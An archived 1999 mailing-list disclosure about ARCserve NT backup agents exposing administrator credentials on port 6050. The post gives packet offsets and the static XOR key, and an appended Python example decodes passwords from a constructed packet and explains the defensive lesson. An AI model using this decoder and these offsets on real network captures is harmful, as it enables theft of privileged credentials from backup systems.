---------- Forwarded message ----------
Date: Sun, 21 Feb 1999 17:44:55 -0500
From: ELVIS <LEEEEEECHat_private>
To: newsat_private
Cc: hotnewsat_private, CAI <supportat_private>, securityat_private
Subject: Severe Security Hole in ARCserve NT agents

This is absolutely pathetic.

You can obtain user names and passwords used by ARCserve NT agents when an NT system is backed up over a TCP/IP network. Usually, for complete access to the system, these accounts will be granted administrator rights.

This only affects the "stock" NT agents. The Exchange and SQL backup agents appear to use NTLANMAN authentication (which has its own problems). There are probably similar exploits available over IPX/SPX and NetBEUI, but this note only covers TCP/IP.

Set your sniffer (Network Monitor from Systems Management Server will do) to listen for TCP/IP packets directed to port 6050 (17A2 hex). This will be the ARCserve server connecting to the remote client. The third packet you get is the one you want. The user name will be at offset 0x00EE in clear ASCII text. The password will be at offset 0x011E. Simply XOR these bytes with the ASCII values of the string "Ambuf1,et(0,21)", minus quotes of course, to get the PLAIN TEXT password!

ACK! YOU THOUGHT MICROSOFT WAS BAD!!!! GAG! BARF! These people SHOULD BE ASHAMED OF THEMSELVES!!!!

If you bother to search, you will find "Ambuf1,et(0,21)" in no less than 17 ARCserve EXEs and DLLs.

It is suggested that all ARCserve customers cease using the NT agents immediately if not sooner.
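The "protection" the post describes reduces to repeating-key XOR with a constant string that ships inside the product. The Python below is an added example, not part of the original post and not ARCserve code: it models that masking to make the cryptographic point plain, namely that XOR with a fixed key is its own inverse, so anyone who can read the packet and the key string reads the password. The key string and the two offsets are the ones quoted in the post; the packet layout around them, the field width, and the sample credentials are constructed assumptions.

```python
# Added example (not from the original post): a model of fixed-key XOR masking,
# written to show why it is obfuscation rather than encryption.
# KEY, USER_OFFSET and PASS_OFFSET are the values quoted in the post; the
# packet layout, FIELD_LEN and the sample credentials are assumptions.
KEY = b"Ambuf1,et(0,21)"   # static string quoted in the post
USER_OFFSET = 0x00EE       # user name offset, as stated in the post
PASS_OFFSET = 0x011E       # password offset, as stated in the post
FIELD_LEN = 0x30           # assumed field width (0x011E - 0x00EE); not from the post


def xor_with_key(data: bytes, key: bytes = KEY) -> bytes:
    """Repeating-key XOR.  Because x ^ k ^ k == x, one function both masks and
    unmasks: the scheme is exactly as strong as the secrecy of a string that
    sits in clear in the shipped binaries, i.e. not at all."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_packet(user: bytes, password: bytes) -> bytes:
    """Constructed stand-in for the agent packet: zero-filled buffer, user name
    in clear ASCII at USER_OFFSET, key-masked password field at PASS_OFFSET."""
    if len(user) > FIELD_LEN or len(password) > FIELD_LEN:
        raise ValueError("credential longer than the assumed field width")
    buf = bytearray(PASS_OFFSET + FIELD_LEN)
    buf[USER_OFFSET:USER_OFFSET + len(user)] = user
    # The whole fixed-width field is masked, zero padding included.
    masked = xor_with_key(password.ljust(FIELD_LEN, b"\0"))
    buf[PASS_OFFSET:PASS_OFFSET + FIELD_LEN] = masked
    return bytes(buf)


def extract_credentials(packet: bytes) -> tuple[str, str]:
    """What a passive observer of the session recovers with nothing more than
    the packet and the published key string.  This is the risk the post is
    reporting: the wire format gives no confidentiality for the account."""
    user_field = packet[USER_OFFSET:USER_OFFSET + FIELD_LEN]
    pass_field = packet[PASS_OFFSET:PASS_OFFSET + FIELD_LEN]
    user = user_field.split(b"\0", 1)[0]
    # Unmask the whole field first, then trim the (now zero) padding.
    password = xor_with_key(pass_field).split(b"\0", 1)[0]
    return user.decode("ascii"), password.decode("ascii")


if __name__ == "__main__":
    # Constructed sample credentials; not real values.
    packet = build_packet(b"BACKUP_SVC", b"Secr3t!")
    print("masked bytes on the wire:", packet[PASS_OFFSET:PASS_OFFSET + 7].hex())
    print("recovered by anyone holding the key string:", extract_credentials(packet))
```

The defensive reading is the one the post reaches: a static XOR key is a constant of the program, not a secret, so the account an agent authenticates with must be treated as exposed to anyone on the backup network segment, and the mitigation is to stop using that authentication path (or put it inside an authenticated, encrypted transport) rather than to hide the key better.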
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:36:50 PDT